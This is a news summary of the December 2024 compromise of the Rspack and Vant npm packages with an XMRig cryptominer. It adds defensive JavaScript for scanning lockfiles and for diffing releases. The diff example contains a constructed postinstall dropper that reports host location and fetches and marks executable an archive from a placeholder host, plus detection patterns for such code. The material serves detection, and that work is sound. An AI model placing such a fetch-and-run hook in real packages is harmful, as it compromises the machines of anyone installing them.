Npm Packages Compromised: Cryptominers Hidden in Popular Rspack and Vant Libraries
December 20, 2024
Researchers from Sonatype and Socket identified the malware hidden in the compromised packages as XMRig, a cryptocurrency miner that was used to mine Monero on affected systems.
In the Vant package, the XMRig binary was downloaded from a GitHub repository and saved as '/tmp/vant_helper', a name chosen to make the miner look like a legitimate helper process.
The malware not only mined cryptocurrency but also collected geographic location and network details from victims' systems, potentially enabling targeted attacks.
This incident is part of a broader trend of supply chain attacks targeting popular open-source packages, following similar incidents involving platforms like LottieFiles and Ultralytics.
A coordinated attack compromised three npm packages—@rspack/core, @rspack/cli, and Vant—by exploiting stolen npm account tokens, which allowed the publication of malicious versions that installed cryptominers.
Multiple versions of the Vant package, a popular Vue.js UI library with around 46,000 weekly downloads, were found to contain crypto-mining malware, prompting the maintainers to issue a clean update.
Rspack, a JavaScript bundler written in Rust, has significant download numbers, with its core component and CLI tool receiving 394,000 and 145,000 weekly downloads, respectively.
Following the discovery of the attack on December 19, 2024, the maintainers of Rspack and Vant swiftly removed the compromised versions (1.1.7 of both Rspack packages, and the affected Vant releases) from the npm registry and published clean releases (1.1.8 for Rspack and 4.9.15 for Vant).
This incident highlights the urgent need for stricter safeguards in package management systems to protect developers from compromised releases, although no safeguard will eliminate the risk entirely.
With publishing access to the packages, the attackers embedded scripts that ran at installation time and sent host details, including the IP address and location data, to a remote server.
Designed for stealth, the miner capped its CPU usage at 75%, keeping enough of the machine busy to be profitable without the sustained full load that would draw attention.
Researchers identified the malicious changes by diffing the compromised versions against the preceding clean ones, which underscores the value of differential analysis in detecting software supply chain attacks.
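The first question for anyone running these libraries is whether a compromised release is pinned anywhere in their dependency tree, including nested copies pulled in by other tools. The following is an added example, not code from the page or from the Rspack or Vant projects: it scans a package-lock.json for known-bad releases in both lockfile formats npm has produced. The 1.1.7 versions of @rspack/core and @rspack/cli come from the page; the page only says "multiple versions" of Vant were affected, so the Vant entry is left empty and must be filled from the maintainers' advisory. The sample lockfiles and the package name `legacy-tool` are constructed for the demonstration.

```javascript
// Added example, not code from the page or from the Rspack/Vant projects:
// scan a package-lock.json for releases known to be compromised, covering
// both lockfile formats (v1 nested "dependencies", and the v2/v3 flat
// "packages" map, which also records nested copies under
// node_modules/<a>/node_modules/<b>).
//
// The 1.1.7 entries are the Rspack versions named on the page. The page only
// says "multiple versions" of Vant were affected, so the 'vant' entry is left
// empty here (assumption) and must be filled from the maintainers' advisory.
const COMPROMISED = {
  '@rspack/core': new Set(['1.1.7']),
  '@rspack/cli': new Set(['1.1.7']),
  vant: new Set([]), // assumption: populate from the Vant advisory
};

// Package name from a v2/v3 lockfile key such as
// "node_modules/foo/node_modules/@rspack/core" -> "@rspack/core".
function nameFromLockKey(key) {
  const marker = 'node_modules/';
  return key.slice(key.lastIndexOf(marker) + marker.length);
}

// Returns every installed copy whose (name, version) is in the bad list,
// with its position in the tree so it can be traced back to a dependent.
function findCompromised(lock, compromised = COMPROMISED) {
  const hits = [];
  if (lock.packages) {
    // lockfileVersion 2 or 3: flat map keyed by install path
    for (const [key, meta] of Object.entries(lock.packages)) {
      if (key === '') continue; // the root project entry, not a dependency
      const name = nameFromLockKey(key);
      if (compromised[name] && compromised[name].has(meta.version)) {
        hits.push({ name, version: meta.version, where: key });
      }
    }
  } else if (lock.dependencies) {
    // lockfileVersion 1: nested tree
    const walk = (deps, trail) => {
      for (const [name, meta] of Object.entries(deps)) {
        const where = trail ? `${trail} > ${name}` : name;
        if (compromised[name] && compromised[name].has(meta.version)) {
          hits.push({ name, version: meta.version, where });
        }
        if (meta.dependencies) walk(meta.dependencies, where);
      }
    };
    walk(lock.dependencies, '');
  }
  return hits;
}

// Constructed lockfiles for demonstration: a v3 file with a nested copy of
// @rspack/core under a fictional "legacy-tool", and the same tree in v1 form.
const SAMPLE_LOCK_V3 = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '0.0.1' },
    'node_modules/@rspack/core': { version: '1.1.7' },
    'node_modules/@rspack/cli': { version: '1.1.8' },
    'node_modules/vant': { version: '4.9.15' },
    'node_modules/legacy-tool': { version: '2.0.0' },
    'node_modules/legacy-tool/node_modules/@rspack/core': { version: '1.1.7' },
  },
};

const SAMPLE_LOCK_V1 = {
  lockfileVersion: 1,
  dependencies: {
    '@rspack/core': { version: '1.1.7' },
    '@rspack/cli': { version: '1.1.8' },
    vant: { version: '4.9.15' },
    'legacy-tool': {
      version: '2.0.0',
      dependencies: { '@rspack/core': { version: '1.1.7' } },
    },
  },
};

// Usage: node check-lock.js ./package-lock.json (exits 1 on any hit).
if (typeof require !== 'undefined' && require.main === module && process.argv[2]) {
  const lock = JSON.parse(require('fs').readFileSync(process.argv[2], 'utf8'));
  const hits = findCompromised(lock);
  for (const h of hits) console.log(`COMPROMISED ${h.name}@${h.version} at ${h.where}`);
  process.exit(hits.length ? 1 : 0);
}
```

Run it against every lockfile in CI, not just the application's own: a clean top-level pin of 1.1.8 says nothing about a second copy hoisted under another tool, which is exactly the case the nested sample shows.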
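Differential analysis here means comparing a suspect release with the last known-clean one and looking at what changed: new lifecycle hooks in package.json, new dependencies, and new or modified files, then reading those files for behaviour a UI library or bundler has no reason to have. The following is an added example, not code from the page or from the Rspack or Vant projects; it implements that comparison over in-memory representations of two releases (package.json manifest plus a file map, which in practice you would fill from `npm pack <name>@<version>` tarballs). The package name `example-ui`, the file `scripts/setup.js`, its contents, and the indicator regexes are all constructed for the demonstration and are informed by the behaviour the page describes, not taken from the actual payload.

```javascript
// Added example, not code from the page or from the Rspack/Vant projects:
// differential analysis of two releases of an npm package. Each release is
// represented as its package.json manifest plus a map of file path -> content.
// All sample names, versions and script contents below are constructed.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Constructed indicator list (assumption, not a vetted ruleset) for code that
// should not appear in a UI library: spawning processes, dropping files in
// /tmp, fetching from a remote host, looking up the host's location, and
// making a dropped file executable.
const INDICATORS = [
  { id: 'spawns-process', re: /child_process|exec(?:Sync)?\(|spawn(?:Sync)?\(/ },
  { id: 'writes-tmp', re: /\/tmp\// },
  { id: 'remote-fetch', re: /https?:\/\// },
  { id: 'geo-lookup', re: /ipinfo|geoip|ip-api/i },
  { id: 'makes-executable', re: /chmod/ },
];

function scanIndicators(content) {
  return INDICATORS.filter((i) => i.re.test(content)).map((i) => i.id);
}

// Compare a clean release with a suspect one and return structured findings.
function diffPackageVersions(clean, suspect) {
  const findings = [];

  // 1. Lifecycle hooks: the usual way a package runs code on `npm install`.
  const cleanScripts = clean.manifest.scripts || {};
  const suspectScripts = suspect.manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (suspectScripts[hook] && suspectScripts[hook] !== cleanScripts[hook]) {
      const kind = hook in cleanScripts ? 'lifecycle-changed' : 'lifecycle-added';
      findings.push({ kind, hook, command: suspectScripts[hook] });
    }
  }

  // 2. New runtime dependencies (a second place to hide a payload).
  const cleanDeps = clean.manifest.dependencies || {};
  for (const [name, range] of Object.entries(suspect.manifest.dependencies || {})) {
    if (!(name in cleanDeps)) findings.push({ kind: 'dependency-added', name, range });
  }

  // 3. Files added, modified or removed; new/changed content is scanned.
  for (const [path, content] of Object.entries(suspect.files)) {
    if (!(path in clean.files)) {
      findings.push({ kind: 'file-added', path, indicators: scanIndicators(content) });
    } else if (clean.files[path] !== content) {
      findings.push({ kind: 'file-modified', path, indicators: scanIndicators(content) });
    }
  }
  for (const path of Object.keys(clean.files)) {
    if (!(path in suspect.files)) findings.push({ kind: 'file-removed', path });
  }
  return findings;
}

// A new install hook together with indicator hits in new code is the
// combination worth escalating; anything else still deserves a human look.
function verdict(findings) {
  if (findings.length === 0) return 'identical';
  const hookChanged = findings.some((f) => f.kind.startsWith('lifecycle'));
  const indicatorHit = findings.some((f) => (f.indicators || []).length > 0);
  return hookChanged && indicatorHit ? 'suspicious' : 'review';
}

// Constructed sample releases of a fictional UI library.
const CLEAN_RELEASE = {
  manifest: { name: 'example-ui', version: '1.0.0', scripts: { build: 'vite build', test: 'vitest run' } },
  files: {
    'lib/index.js': "module.exports = { Button: require('./button') };\n",
    'lib/button.js': 'module.exports = function Button() {};\n',
  },
};

const SUSPECT_RELEASE = {
  manifest: {
    name: 'example-ui',
    version: '1.0.1',
    scripts: { build: 'vite build', test: 'vitest run', postinstall: 'node scripts/setup.js' },
  },
  files: {
    ...CLEAN_RELEASE.files,
    // Constructed stand-in for a dropper: reports the host's location, then
    // fetches an archive into /tmp and makes it executable.
    'scripts/setup.js': [
      "const { execSync } = require('child_process');",
      "const https = require('https');",
      "https.get('https://ipinfo.example/json', (r) => { /* report IP + location */ });",
      "execSync('curl -sL https://downloads.example/helper.tgz | tar xz -C /tmp && chmod +x /tmp/ui_helper');",
    ].join('\n'),
  },
};
```

The point of the structured output is that a lifecycle hook added in the same release as a new file full of process-spawning and download code is a very different signal from a hook that merely changed its build command; the verdict function encodes that distinction so the check can gate a dependency bump in CI.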
Summary based on 3 sources
Sources
The Hacker News • Dec 20, 2024: Rspack npm Packages Compromised with Crypto Mining Malware in Supply Chain Attack
BleepingComputer • Dec 20, 2024: Malicious Rspack, Vant packages published using stolen NPM tokens
Security Boulevard • Dec 20, 2024: OSS in the crosshairs: Cryptomining hacks highlight key new threat